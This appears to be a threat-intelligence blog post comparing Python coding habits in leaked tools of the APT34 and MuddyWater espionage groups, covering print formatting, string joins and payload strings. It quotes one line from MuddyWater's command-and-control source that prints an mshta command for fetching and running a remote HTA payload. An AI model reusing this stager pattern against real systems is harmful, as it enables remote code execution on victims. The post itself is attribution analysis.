Many state sponsored groups have been identified over time, many of them have different names (since discovered by different organizations) and there is no an agreed standardization on the topic but many victims and some interests look very tight together. From here the idea to compare the leaked source code of two different state sponsored cyber-espionage groups, looking for similarities and for differences in coding style rather than on functionalities.
While I analyzed several APT34 samples ( some of my public analyses are available here,here and here) it’s the first time I take a closer look to MuddyWater artifacts. Currently available here the MuddyWater leaked tools are written in Python and implement neat functionalities for automate infection chains.
The MuddyWater attacks are primarily against Middle Eastern nations. However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA. MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “POWERSTATS”. Despite broad scrutiny and reports on MuddyWater attacks, the activity continues with only incremental changes to the tools and techniques.MISP-TI
Today I’d like to look for strong and weak similarities between ATP34 and MuddyWater, I wont reach any conclusions so far, so I am not getting into the topic “they are the same group” or “they actually live in the same building” or again “they did not belong to the same matrix” or whatever topic related to such, but I think there are some similarities (mostly weak) and quite evident differences (again weak differences) in the way they code in Python. I am aware that the following practices are not overwhelming evidences, but you might agree with me that developers spend years in defining the best and the most beautiful way to implement their code. It would be difficult to code with “someone else style” by changing their coding habitat.
The sources I am going to compare are the sources belonging to the “last leaked” MuddyC3 and to the “previously leaked” WebMask. Everything is freely available online for further checks. The following sections introduce some notes on the observed coding styles and try to motivate them.
The sources show differences in the printing function. MuddyWater implements a more “fancy” printing function by adding the symbol “[+]” when things go in the right direction and by adding the symbol “[-]” when flows hit errors or some unwanted conditions. Moreover MuddyWater uses color in outputs by implementing a core function called
colors.py. These amenities are not available in the APT34 sources.
Both of the groups uses single quote for printing string and use the
+ operator as concatenation string in print functions rather than
%s operator. MuddyWater in complex substitution strings uses
\n at the beginning of the string and at the very end, while in the APT34 sources is not a common practice. ie.
print "\nmshta http://%s:%s/hta\n"%(config.IP,config.PORT)(is MuddyWater Style). APT34 looks like using the
#print 'something'while in MuddyWater it is not a common practice at all (only one occurrence). I would say that the print behavior differ from one to another.
Payload delivery as multi-line string
Both of the analysed groups use the multi-line string for delivery the relative payloads. However the writing style is quite different. For example APT34 uses the “real” multi-line, while MuddyWater abuses the multi-line exploiting its auto-escape indirect proprieties. The following images show what I mean while saying “exploiting the auto-escape” function.
MuddyWater delivers its payload in a inline multi-string, avoiding to escape special characters, while APT34 prefers to use the same technique but expanding the payload in order to promote the readability. However both groups frequently use the operator
=+ for concatenation and both of them use the
' '.join( to build up objects from empty strings. Interesting to spot a different style inside the MuddyWater package. Indeed in
core/webserver.py the developer uses
' '.join( while in
core/resa.py the developer used both:
' '.join( and
" ".join( (NB the double quote). This is quite wired to me, maybe was more then one developers involved in the developing ?
Code functions and loops
Both groups use a quite clear and identical function nomenclature. While the developer might decide to use many different nomenclatures such as: “CamelMultipleNames”, “Firstcapital”, “lowercase”, “with_underscore”, and so on and so forth, both APT34 and MuddyWater have chosen to go with the “lowercase_with_underscore” mode. If you are thinking to: “Hey, but this is a Python best practice !”, well it is true but it is also true that is not a mandatory choice, moreover the analysed source codes do not implement PEP8/4 at all, so I don’t think developers followed the suggested style guidelines. Again both of groups use a lot the operator
rather than using
for i in range
while loop. Both adopted a nice code protection, in order to avoid unexpected exceptions or un-managed user input which might rise wired behaviours. MuddyWater is well-known for the way they obfuscate powershell payloads. They like to
replace functions. The following image shows a crafted internal function called
The following table sums up the similarities and the differences that I found. You might find a
- character for every difference and a
+ character for each similarity. Again, I am not expressing any personal opinion about the group membership, and I am aware that some of these similarities could be associate to a good code practice but I believe it is still interesting to know that those two groups have their own style similarities.
|printing style ||Initial and very end||No||–|
|comment usage||nope significant||Yes||–|
|Multi-line delivery||multi-line “inline”||real “multi-line||–|
|Join statement||wide usage of ||wide usage of ||+|
If we consider the first three differences as a single difference since focused on “printing” we might observe 3 differences and 5 similarities.